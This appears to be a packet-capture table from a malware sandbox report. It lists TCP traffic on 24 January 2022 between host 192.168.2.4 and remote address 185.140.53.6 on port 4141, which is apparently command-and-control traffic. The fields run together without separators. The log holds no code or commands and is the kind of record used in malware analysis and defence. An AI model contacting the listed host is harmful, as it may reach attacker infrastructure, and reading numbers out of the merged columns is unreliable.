                        Jan 24, 2022 02:25:10.471651077 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.472353935 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.472412109 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.472573042 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.474299908 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.474390984 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.484222889 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.558737993 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.558829069 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.560391903 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.560432911 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.560461044 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.560491085 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.563112974 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.563808918 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.564619064 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.564660072 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.564682961 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.564699888 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.564704895 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.564743996 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.564851046 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.564934015 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.565082073 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.565135002 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.565155983 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.565215111 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.565279007 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.565326929 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.565423012 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.565526962 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.565658092 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.565758944 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.565809965 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.566781998 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.567048073 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.567112923 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.567765951 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.567928076 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.577526093 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.577626944 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.577802896 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.577877045 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578063965 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578099966 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578134060 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578154087 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578397036 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578439951 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578475952 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578495979 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578517914 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578598976 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578650951 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578708887 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578762054 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578879118 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.578934908 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.578996897 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.579049110 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.579140902 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.579195976 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.579226971 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.579266071 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.579278946 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.579313993 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.579488993 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.579540014 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.579556942 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.579606056 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.647974014 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.648483038 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.648813009 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.648910046 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.649755955 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.649835110 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.650116920 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.650686979 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.651271105 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.658823967 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.661022902 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.661106110 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.661184072 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.661214113 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.661281109 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.661334991 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.663120031 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.663188934 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.663398027 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.663533926 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.663616896 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.663773060 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.663790941 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.663846970 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.663867950 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.663995981 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.664135933 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.664197922 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.664335966 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.664386988 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.664400101 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.664536953 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.664618969 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.664688110 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.664776087 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.664835930 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.664880991 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.665456057 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.666677952 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.666747093 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.666951895 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.667017937 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.667627096 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.667968035 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.670422077 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.671737909 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.677690983 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.677894115 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.678149939 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.678271055 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.678335905 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.678374052 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.678436041 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.678554058 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.678618908 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.678630114 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.678726912 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.678816080 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.678879976 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.678930044 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.678951025 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.679004908 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.679059029 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.679081917 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.679181099 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.679198980 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.679301977 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.679383993 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.679445982 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.679495096 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.679620028 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.679620028 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.679682016 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.695152998 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.695190907 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.695266962 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.695269108 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.695327044 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.697042942 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.697124958 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.731724024 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.731759071 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.731836081 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.748183966 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.748250008 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.748269081 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.748303890 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.748331070 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.748421907 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.748471022 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.748632908 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.758047104 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.758260012 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.769778013 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.769804955 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.769906998 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.769922972 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.769936085 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.769957066 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.769999981 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.770030022 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.770085096 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.770276070 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.770338058 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.770412922 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.770453930 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.770472050 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.770508051 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.770534039 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.771711111 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.771785975 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.782511950 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.782629013 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.782840014 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.782869101 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.782917023 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.782933950 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.782938957 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783016920 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783071041 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783097982 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783139944 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783163071 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783438921 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783539057 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783602953 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783622026 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783685923 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783699989 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783756018 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783807039 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783866882 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.783896923 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.783957958 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.784039974 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.784097910 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.784178972 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.784250975 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.784270048 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.784329891 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.784375906 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.784435034 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.784622908 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.784687996 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.784816027 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.784914970 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.788260937 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.792727947 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.792749882 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.792817116 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.792892933 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.793122053 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.793261051 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.793324947 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.793332100 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.793402910 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.793700933 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.793879032 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.793950081 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.794018030 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.794193983 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.794255018 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.799607992 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.799720049 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.799772978 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.800057888 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.800143003 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.800168991 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.800192118 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.800231934 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.800263882 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.813124895 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.831398964 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.831470013 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.831562042 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.831589937 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.874083042 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874130011 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874174118 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874214888 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.874249935 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.874274969 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874417067 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874478102 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.874546051 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874600887 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.874722958 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874783993 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.874814034 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874872923 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.874933958 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.874989986 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.875010967 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.875065088 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.875180006 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.875247002 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.875279903 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.875334024 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.875392914 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.875448942 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.875555992 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.875607967 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894048929 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894089937 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894143105 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894207001 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894254923 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894273996 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894334078 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894361019 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894412994 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894573927 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894633055 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894654989 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894701958 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894745111 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894798994 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.894931078 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894954920 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.894983053 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.895003080 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.895082951 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.895210981 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.895265102 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.895378113 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.895427942 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.895668983 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.895698071 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.895735025 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.895751953 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.895772934 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.895840883 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.895895958 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.895972013 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.896020889 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.896097898 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.896148920 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.896260023 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.896311045 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.896452904 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.896512985 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.896614075 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.896661997 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.936511993 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.936562061 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.936654091 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.936682940 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.936728954 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.938118935 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.938152075 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.938222885 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.938251019 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.941560030 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.941941977 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.942023039 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.942047119 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.942100048 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.942166090 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.942224026 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.942286015 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.942337990 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.942440987 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.942495108 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:10.942563057 CET414149777185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:10.942609072 CET497774141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:14.872493029 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:14.965198994 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:14.965322018 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:14.965822935 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:15.214595079 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:15.214689016 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:15.514138937 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:15.514251947 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:15.642194033 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:15.642328024 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:15.948287964 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:15.948384047 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.139717102 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.139753103 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.139976025 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.140007973 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.225701094 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.225867033 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.240303993 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.240360022 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.240400076 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.240468025 CET497784141192.168.2.4185.140.53.6
